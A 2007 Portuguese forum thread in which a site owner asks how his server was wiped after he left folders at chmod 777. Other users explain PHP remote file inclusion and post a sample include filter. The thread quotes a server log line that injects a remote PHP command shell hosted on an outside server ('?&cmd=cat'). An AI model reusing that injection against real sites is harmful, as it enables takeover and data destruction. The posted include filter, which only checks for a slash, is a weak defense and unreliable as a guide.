11 replies to this topic

[nemsei]

Galera,

Estou tendo sérios problemas no meu site por causa de permissões em pasta, alias, creio que o problema seja isso.

Por uma incrivel marcação eu deixei as opções de permissão chmode 777 habilitado em um monte de pasta no meu servidor e simplesmente sumiram....isso é, deletaram totalmente, gostaria de saber se alguem aqui já teve este problema?...qual seria a melhor solução para isso?

Vocês devem ser perguntar por que o titulo, bom, é que ao que parece a ferramenta usada foi feita por este revengans, esta gravado no log do servidor as tentativas por "get"...é um código em php, já olhei, estudei, mas não tive muito sucesso, estou precisando de uma ajuda mesmo....

Pessoal, o que gostaria é de entender como a invasão funciona....para que eu possa corrigir o erro, se alguem ter idéia...é por injeção de codigos mesmo?

Qualquer ajuda, ficarei muito grato...valeu mesmo pessoal...

grande abraço galera

[Noturno]

Ué se vc deixou chmod 777 na pasta quer dizer que qualquer um pode gravar, ler e executar ela... simples.. não deixe na próxima vez.

[nemsei]

OK...ok muito bom sua resposta. conclusiva.

O legal de fórum é isso, no intuito de ajudar ou de simplesmente aumentar o número de respostas temos respostas de tudo que é nível.

Amigo o problema é mais embaixo, eu queria ver se aqui alguem já passou por algo deste tipo, eu fiz um sistema de upload para esta pasta, o meu sistema usa funções de upload, então a pasta precisa ter permissão para os usuários postarem arquivos, deletarem etc....bom, eu sei que posso mudar as funções de upload para funções de ftp e pronto resolvo o problema, tiro a permissão da pasta e deixo permissão apenas no usuário do ftp.

Só que o lance que eu sempre trago comigo, que para solucionar o problema eu preciso entender...compreender, daí sim darei um passo certo na resolução e não tapar o sol com a peneira.

É exatamente por isso que postei uma msg aqui, no intuito de ver se alguem já estudou esta ferramenta PHP, se alguem já foi vitima disso, onde esta ferramenta age...se vocês quiserem eu posto o codigo aqui...

é isso, mas mesmo assim valeu pela resposta....pelo menos você respondeu algo.

[Noturno]

Você deveria ser mais calmo na sua resposta, não tenho obrigação de ajuda-lo, devido a sua péssima redação não entendi sua dúvida.
Me fez perder todo o tesão em te ajudar, vai procurar no google, talvez ele seja mais paciente do que eu.

[nemsei]

Eu tive total paciência, tanto é que te respondi...agora não precisa ficar bravo só por que tratei sua resposta com desdenho...foi mal.

Isso acontece, da próxima vez você pensa melhor antes de postar uma msg.

Alias, uma coisa eu concordo contigo, eu sou péssimo de redação, realmente é o meu fraco.


Pessoal, o que gostaria é de entender como a invasão funciona....para que eu possa corrigir o erro, se alguem ter idéia...é por injeção de codigos mesmo?


Mas eu acho que uma msg mais clara do que isso é impossível....Noturno não fique bravo, por favor. Não estou aqui para arranjar confusão.

Abraço cara.

[Noturno]

Só tome mais cuidado nas respostas kra, eu estou aqui por livre e espontânea vontade de ajudar da mesma forma que me ajudaram a 4 anos atras. E não teria pq eu dizer algo sem fundamento aqui, achei que sua dúvida fosse realmente aquela.
Mas vou lhe responder sobre métodos de invasão.

Você deixando qualqer pasta com CHMOD 777 no seu servidor é fatal, dificilmente vc vai conseguir segurar a bronca por causa disso, qualquer um pode upar um exploit e conseguir acesso root.
O que ele precisa é apenas de uma shell, e shells existem milhares espalhadas por ai.

Depois ele roda um backdoor e já era.
As dicas de segurança podem variar e muito, preciso saber qual é o O.S. do seu servidor, versão do Apache, etc...
O Bom é sempre manter seu servidor com as últimas atualizações.
Inicialmente é isso.
Se você quiser saber se o seu servidor é vulnerável a ataques recomendo utilizar um scanner chamado Acunetix ou o Shadow Scanner, eles fazem um scan bom... se você já manjar um pouco mais utilize o nmap para procurar portas abertas desnecessáriamente e etc., agora se o seu servidor for alugado, comunique com o datacenter para eles verificarem.
Por enquanto é isso.

[mgomes]

Caro nemsei,

Eu acredito que a sua resposta foi muito ingrata.. pelo visto não leu as Regras de Utilização (http://forum.wmonlin...?act=boardrules).

Uma simples pesquisa no Google iria lhe ajudar.. mas como é melhor perguntar do que procurar né amigão?

Procure no google por Php Injection, Sql Injection ou CHMOD 777

Eu até poderia procurar isso pra você.. mas fico indignado com alguns usuários do fórum por isso não perco meu tempo com os mesmos!

Até mais e sucesso!

[nemsei]

Noturo...valeu cara, pela resposta. Excelente

Obrigado também pelas dicas de scan, já usei o nmap.

Bom cara, olha que estranho. Aqui na empresa eu tenho servidores para asp e php...eu tenho um servidor .net com framework 1.1. até ai blz, também tenho o apache para algumas aplicações em php. blz.

O que aconteceu, e não sei se isso é possível, mas o cara através de parametros sendo enviados por url (método get) rodou um exploit que estava no servidor dele (php) e deletou tudo que estava no meu servidor (asp.net).

Mas a duvida esta aqui, isso é possivel?...que loucura cara, ele não precisava mandar para o meu servidor o arquivo php?, e daí rodar?...por que eu peguei o codigo e este arquivo php lista as pasta com permissão, deleta, tem um prompt de comando como se fosse um ssh, onde envia comandos para o servidor, ele também pode utilizar o metodo wget para enviar arquivos para o meu servidor. Bom no link abaixo tem alguns scripts dele

http://www.novota.cz...d/xpl/pro18.txt

Nós logs ficou gravado algo como:

/java script:Galeria=void(window.open('galeria/ CodGaleria=34','Galeria','width=610,height=415,scrollbars=no,
resizable=no,toolbar=no,left=50,top=http://www.novota.cz/_upload/download/xpl/pro18.txt?&cmd=cat%20bugado

Isso acima é possivel?...



PS: mgomes eu já me acertei com o Noturno, o mais engraçado é isso no mundo, todo mundo fala em dialogo, todo mundo fala em resolver as coisas conversando, e quando isso acontece, o pessoal fica indignado. Sabe por que você ta indginado?, por que você queria que eu fosse barrado no fórum, tanto é que já mostrou "as regras do forum", o ser humano não aguenta ver um problema sendo resolvido apenas na conversa, nosso lado sombrio sempre quer uma briga.

Bom norturno, desculpa por qualquer coisa cara...fico feliz de ter resolvido nosso problema apenas CONVERSANDO, como duas pessoas educadas e madura, é asism mesmo que iremos melhorar o mundo.

Edição feita por: nemsei, 06/02/2007, 10:27.

[Noturno]

Simples, vc tem em algum lugar das suas páginas isso:

/java script:Galeria=void(window.open('galeria/ CodGaleria=34','Galeria','width=610,height=415,scrollbars=no,resizable=no,toolbar=no,left=50,top='$akivemalgumavariavel'

Ai o kra rodou um script dele em php, essa técnica chamamos de PHP INJECTION, ela explora uma falha de programação.
ele rodou a função system() e "dominou" sua shell.

revise seus scripts.


dá uma olhada nesse link:
http://www.novota.cz.....md=cat bugado

é a "cmd" do kra, um script que ele usa pra manipular sua shell atraves da função system();

[mgomes]

nemsei,

Primeiramente eu não queria que o senhor fosse barrado.. não sei se você leu mas vai um pedaço:

"d. Ao postar uma pergunta, seja educado e tente incluir todos os detalhes que possam ser úteis para quem se dispuser a ajudá-lo com o problema. Lembre-se que os outros participantes do fórum não o frequentam apenas para responder suas perguntas, mas também para aprender. Além de postar perguntas, tente sempre contribuir com algo. Os participantes mais respeitados e mais queridos são sempre os que ajudam mais.
Extra: Como fazer perguntas inteligentes? "

Agora o que você postou foi isso:

"OK...ok muito bom sua resposta. conclusiva."

Bom eu não quero dar continuidade na discussão.. mas acredito que você é um usuário ´´criança´´ que ao não ver uma resposta a altura fica 'mordido' e retruca.

Boa sorte e Sucesso!

[nemsei]

aí usuário criança é excelente....heheheheeheh

meu Deus, em fórum da de tudo mesmo....realmente eu fico mordido quando tenho respostas que não seja altura da minha pergunta, e fico grato quando tenho resposta acima das minhas indagações. Assim como fez o noturno.


Noturno, para não perder o tópico com discussão de chaves, eu vou postar abaixo a resolução do problema para os programadores php.

O que você respondeu no tópico acima tem total fundamento.


Vamos lá:

Realmente o que foi feito é um php injection, ele fez isso num site que tenho aqui, o que me deixou confuso é que ele tentou a mesma técnica no asp.net, e daí pensei, como?...mas não foi isso, ele tentou por tentar o problema mesmo estava no php

Quando desenvolvemos aplicações web, alguns programadores tem o modo errado de passar parametros por método get

ex: http://www.meusite.c...agina=algumnome

isso é arriscado, pois a partir desta url eu posso chamar um exploit de outro servidor e fazer sua página executa-lo, se o exploit em questão for igual ao que mencionei acima, ele pode roubar a shell (como o noturno falou), e daí companheiro o servidor é dele.

Não vou postar a técnica e talz, por que isso aqui não é um manual de script kiddies...então só fica aí o alerta, se quiserem saber detalhes é só me enviar um email.

EU consegui deletar todos os arquivos do meu servidor, subir níveis, fazer upload...qualquer coisa.

valeu pessoal...especialmente para noturno e mgomes meus companheiros de bate papo.

[Noturno]

Na verdade o real problema não é na GET, e sim no conjunto da obra, eu uso GET e não encontro nenhuma falha nos meus scripts(includes).

Utilizo da seguinte forma:

<?
			   $vai = $_GET['vai'];
			   if (!isset($vai))
			   include("home.php");
			   else if(ereg("/",$vai))
			   include("forbidden.php");
			   else {
			   if (file_exists("$vai.php"))
			   include_once("$vai.php");
			   else include("notfound.php");
			   }
			   ?>

Não tem muito mistério, se alguém achar alguma falha por favor me avise, mas uso dessa forma a 3 anos e nunca tive problemas, e olha que já tentaram me atacar diversas vezes.

E tem jeito de pegar script kiddies nessa brincadeira, a maioria dos kras que usam php injection são script kiddies, são tão lammers que se quer utilizam proxy, depois posto uma função que fiz para gravar o IP de usuários que tentam php injection e sql injection.

Edição feita por: Noturno, 06/02/2007, 16:32.